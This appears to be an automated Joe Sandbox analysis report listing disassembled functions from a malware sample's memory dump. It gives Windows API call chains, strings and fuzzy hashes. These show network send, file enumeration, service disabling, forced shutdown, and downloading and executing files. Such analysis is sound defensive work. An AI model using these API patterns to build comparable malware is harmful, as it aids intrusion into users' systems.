• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: 86f37db820e52bc95f1b680400061f6fe54ebee5e57fa6c185edcd678616e1cc
• Instruction ID: 715df507e8124342435376403b6b4ada8024d2b00f6ae51b05de552adeea40d6
• Opcode Fuzzy Hash: 86f37db820e52bc95f1b680400061f6fe54ebee5e57fa6c185edcd678616e1cc
• Instruction Fuzzy Hash: 7EC24971E096298FDB24CE289D407D9B3B5FB44305F1549EAD88EE7640E7B4AE81CF80
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 15689258
  • Part of subcall function 156848C8: connect.WS2_32(FFFFFFFF,?,?), ref: 156848E0
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 156892F4
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 15689352
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 156893AA
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 156893C1
                                                                                                                                                      • Part of subcall function 15684E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,156F4EF8,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E38
                                                                                                                                                      • Part of subcall function 15684E26: SetEvent.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E43
                                                                                                                                                      • Part of subcall function 15684E26: CloseHandle.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E4C
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 156895B9
                                                                                                                                                      • Part of subcall function 15684AA1: WaitForSingleObject.KERNEL32(?,00000000,15681A45,?,?,00000004,?,?,00000004,156F6B50,156F4EE0,00000000), ref: 15684B47
                                                                                                                                                      • Part of subcall function 15684AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,156F6B50,156F4EE0,00000000,?,?,?,?,?,15681A45), ref: 15684B75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1824512719-0
                                                                                                                                                    • Opcode ID: efb554fa46378d10d7f83ce7a939e89f05474e7d942c26e73401071d00ce3f90
                                                                                                                                                    • Instruction ID: f8c2ad16183272faec07a75e45e3239414e26db3ae560d6dcdca693bb6761962
                                                                                                                                                    • Opcode Fuzzy Hash: efb554fa46378d10d7f83ce7a939e89f05474e7d942c26e73401071d00ce3f90
                                                                                                                                                    • Instruction Fuzzy Hash: 66B17E76A022199BCB14EBA0DD91EEDB7B9BF04314F104259E506A7190EF30BF49CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,1569A38E,00000000), ref: 1569AC88
                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,1569A38E,00000000), ref: 1569AC9C
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,1569A38E,00000000), ref: 1569ACA9
                                                                                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,1569A38E,00000000), ref: 1569ACDE
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,1569A38E,00000000), ref: 1569ACF0
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,1569A38E,00000000), ref: 1569ACF3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 493672254-0
                                                                                                                                                    • Opcode ID: e2fd041ec7becb80ce003be13a83fd7390db55e59c122f61cfc9249d6cf5bfae
                                                                                                                                                    • Instruction ID: 3a7fc22a9ba0682a9975bd80c4b4b92b612a711fdcf0e0bbf5d47b1bec958739
                                                                                                                                                    • Opcode Fuzzy Hash: e2fd041ec7becb80ce003be13a83fd7390db55e59c122f61cfc9249d6cf5bfae
                                                                                                                                                    • Instruction Fuzzy Hash: F901F971555129BFDB044A385C8DE6E3BACEB42170F04070EFD65DA5C0DFA09A05D5E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 15697952: GetCurrentProcess.KERNEL32(00000028,?), ref: 1569795F
                                                                                                                                                      • Part of subcall function 15697952: OpenProcessToken.ADVAPI32(00000000), ref: 15697966
                                                                                                                                                      • Part of subcall function 15697952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 15697978
                                                                                                                                                      • Part of subcall function 15697952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 15697997
                                                                                                                                                      • Part of subcall function 15697952: GetLastError.KERNEL32 ref: 1569799D
                                                                                                                                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 15696856
                                                                                                                                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 1569686B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15696872
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                    • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                    • API String ID: 1589313981-1420736420
                                                                                                                                                    • Opcode ID: c8192ea0bfecc391a42e367e1b15ff21cc3a389a3dce5efc41c553d72a458f32
                                                                                                                                                    • Instruction ID: dd5784d971f97ed939348ae5e95a0ac21737ecc321b1e7a6f1a47bc026726c64
                                                                                                                                                    • Opcode Fuzzy Hash: c8192ea0bfecc391a42e367e1b15ff21cc3a389a3dce5efc41c553d72a458f32
                                                                                                                                                    • Instruction Fuzzy Hash: D92196787063099BDF18EBB48C689EE235E9F51240F400C29A642971C4EE74BC08C3E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 15693549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 15693569
                                                                                                                                                      • Part of subcall function 15693549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 15693587
                                                                                                                                                      • Part of subcall function 15693549: RegCloseKey.ADVAPI32(00000000), ref: 15693592
                                                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 1568F85B
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 1568F8CA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                    • String ID: 4.9.4 Pro$override$pth_unenc
                                                                                                                                                    • API String ID: 2281282204-930821335
                                                                                                                                                    • Opcode ID: 7cd6e055468969a6bff5a027e7ba8d8fb18ab9b41012930234f6a450eb929a29
                                                                                                                                                    • Instruction ID: 8bf4d5a04dd6098ea8c184729b66aeea87c789ae6d7f940d8db1bf657f8f4b4d
                                                                                                                                                    • Opcode Fuzzy Hash: 7cd6e055468969a6bff5a027e7ba8d8fb18ab9b41012930234f6a450eb929a29
                                                                                                                                                    • Instruction Fuzzy Hash: EB210679F16340DBCA08B6798C55AAE7AAA9B81110F80021CF4169B3C4FF24B900C3FF
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,156D275B,?,00000000), ref: 156D24D5
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,156D275B,?,00000000), ref: 156D24FE
                                                                                                                                                    • GetACP.KERNEL32(?,?,156D275B,?,00000000), ref: 156D2513
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                    • Opcode ID: e7750f5709077f2471029e48186f78697de6462744a0c3647559af06b8730bdf
                                                                                                                                                    • Instruction ID: 3f46f85d2f8445b0fd4910317a566f0cf7a63a61b0f34acb98a2b566dc085d1e
                                                                                                                                                    • Opcode Fuzzy Hash: e7750f5709077f2471029e48186f78697de6462744a0c3647559af06b8730bdf
                                                                                                                                                    • Instruction Fuzzy Hash: 02217132A14306A6E725CF54C944EABF3ABFB44A74B468E64ED89D7510EB32D940C3D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 1569B4B9
                                                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,1568F3DE,00000000), ref: 1569B4CD
                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,1568F3DE,00000000), ref: 1569B4D4
                                                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,1568F3DE,00000000), ref: 1569B4E3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                    • String ID: SETTINGS
                                                                                                                                                    • API String ID: 3473537107-594951305
                                                                                                                                                    • Opcode ID: cfe9567d4bdf4631ec9f138bb47bc08810f2ceccb63521e6558f43ae4fc83915
                                                                                                                                                    • Instruction ID: 284bbaadc967fa94bd3067a17dd4b8426cf685d6191f73c4bc7518a2225e2ee2
                                                                                                                                                    • Opcode Fuzzy Hash: cfe9567d4bdf4631ec9f138bb47bc08810f2ceccb63521e6558f43ae4fc83915
                                                                                                                                                    • Instruction Fuzzy Hash: 70E01A76A20229BBDB251BA5CCDCD563E3EFBC9763300056DF94296220CF318400DBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 1568966A
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 156896E2
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 1568970B
                                                                                                                                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 15689722
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1157919129-0
                                                                                                                                                    • Opcode ID: 6e741ec391e5a106599270c9402cb1534c94f41b29a53e162eb70f9f63c8c73a
                                                                                                                                                    • Instruction ID: 82aa40abc2f26b33ad37d367892f78810cec33bf0a992e639233d724b2737e98
                                                                                                                                                    • Opcode Fuzzy Hash: 6e741ec391e5a106599270c9402cb1534c94f41b29a53e162eb70f9f63c8c73a
                                                                                                                                                    • Instruction Fuzzy Hash: A0811B76A02219DBCB15DBA0DC90DEDB7B8BF14214F14426AE456A7190FF30BB49CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                      • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C8274
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8281
                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 156D271C
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 156D2777
                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 156D2786
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,156C4A6C,00000040,?,156C4B8C,00000055,00000000,?,?,00000055,00000000), ref: 156D27CE
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,156C4AEC,00000040), ref: 156D27ED
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 745075371-0
                                                                                                                                                    • Opcode ID: c308cae231e8faebbf210b4fee0bfce7dd3489cc861d7d0329f834d4d447acad
                                                                                                                                                    • Instruction ID: 4757df52c633e764ccfc9265ab0bccfa02cfd36615a49462074607948d61d3a2
                                                                                                                                                    • Opcode Fuzzy Hash: c308cae231e8faebbf210b4fee0bfce7dd3489cc861d7d0329f834d4d447acad
                                                                                                                                                    • Instruction Fuzzy Hash: E2517275A15319ABDB20DFA4CC80ABEF7B9FF18320F010869E995E7150DB71A940CBE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 15688811
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,156E6608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 156888CA
                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 156888F2
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 156888FF
                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15688A15
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1771804793-0
                                                                                                                                                    • Opcode ID: 1ee2e581effd7ca8486d7f8b809b65f31cb5afa21d183c9a9aaf785affbcdae4
                                                                                                                                                    • Instruction ID: f7ca4653f80e2146b99b72e1a0f42d1b98a2764b7ed16dc2c1f5c4c8baa241fe
                                                                                                                                                    • Opcode Fuzzy Hash: 1ee2e581effd7ca8486d7f8b809b65f31cb5afa21d183c9a9aaf785affbcdae4
                                                                                                                                                    • Instruction Fuzzy Hash: 87517076A02309AACF04FBA4DD959ED77BDAF10210F500659E80AA3190FF34BB48CBD5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 15686FBC
                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 156870A0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DownloadExecuteFileShell
                                                                                                                                                    • String ID: C:\Users\user\Desktop\fu56fbrtn8.exe$open
                                                                                                                                                    • API String ID: 2825088817-2507530114
                                                                                                                                                    • Opcode ID: 8e8c88a4268a5d504704f2ad11950c6291b477005ceffe9d1e441f2c4cfe41a7
                                                                                                                                                    • Instruction ID: f352e888483ce43469cf367c7218aa6465dd2ef7cca0cb934d71f909ff5d1766
                                                                                                                                                    • Opcode Fuzzy Hash: 8e8c88a4268a5d504704f2ad11950c6291b477005ceffe9d1e441f2c4cfe41a7
                                                                                                                                                    • Instruction Fuzzy Hash: F461C579B0A3049BCE14EF74CC649BE33AAAF91554F40091DE543576C0EE35BA19C3EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 1569CAD7
                                                                                                                                                      • Part of subcall function 1569376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,156E611C), ref: 1569377E
                                                                                                                                                      • Part of subcall function 1569376F: RegSetValueExA.ADVAPI32(156E611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,1569CAB1,WallpaperStyle,156E611C,00000001,156F4EE0,00000000), ref: 156937A6
                                                                                                                                                      • Part of subcall function 1569376F: RegCloseKey.ADVAPI32(156E611C,?,?,1569CAB1,WallpaperStyle,156E611C,00000001,156F4EE0,00000000,?,1568875D,00000001), ref: 156937B1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                    • API String ID: 4127273184-3576401099
                                                                                                                                                    • Opcode ID: 8140208ec793d37a0143cfc40285381f56c989480149d46b8167f95a0c532681
                                                                                                                                                    • Instruction ID: 4d7e0f7b4518685aa68700557364f46a7afcb18002f511b7d4923f1f220d702e
                                                                                                                                                    • Opcode Fuzzy Hash: 8140208ec793d37a0143cfc40285381f56c989480149d46b8167f95a0c532681
                                                                                                                                                    • Instruction Fuzzy Hash: 49116076F432502BF809B13D8D67FAE3A16D342650F840259E5022F6CEDC931A50C2EB
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                      • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,156C4A73,?,?,?,?,156C44CA,?,00000004), ref: 156D1DBA
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 156D1E4A
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 156D1E58
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,156C4A73,00000000,156C4B93), ref: 156D1EFB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4212172061-0
                                                                                                                                                    • Opcode ID: 9f6a78cdb6aa1bfea8706b99ac304b1f0b5d204cce7d793a6b25321d28adbb0a
                                                                                                                                                    • Instruction ID: eb1f24d4fa2986e30c7565d9d3a1b87b4571c4662eb2eefe2bbb9ca722fec4a6
                                                                                                                                                    • Opcode Fuzzy Hash: 9f6a78cdb6aa1bfea8706b99ac304b1f0b5d204cce7d793a6b25321d28adbb0a
                                                                                                                                                    • Instruction Fuzzy Hash: 6261D77AA05706EAD7149B74CC85EA6F3A8FF08310F11086AE986D7580EBB5F940C7E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(00000000), ref: 1569B509
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
• Opcode ID: 02704ebb8ed5b899cd8d0a54c49dde9aab206211621f70543302bfc8036f9d3d
• Instruction ID: a87abd2cb3bd76f0edca54e649a3535b10a7fd6ebcd89720649a64a665b8215e
• Opcode Fuzzy Hash: 02704ebb8ed5b899cd8d0a54c49dde9aab206211621f70543302bfc8036f9d3d
• Instruction Fuzzy Hash: F2112E766193049BC704DB65D8509FFB3E8AB58210F500A1EF496832D0EF38FA49C6EA
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
  • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
  • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
  • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
  • Part of subcall function 156C8215: _free.LIBCMT ref: 156C8274
  • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8281
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 156D2117
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 156D2168
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 156D2228
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
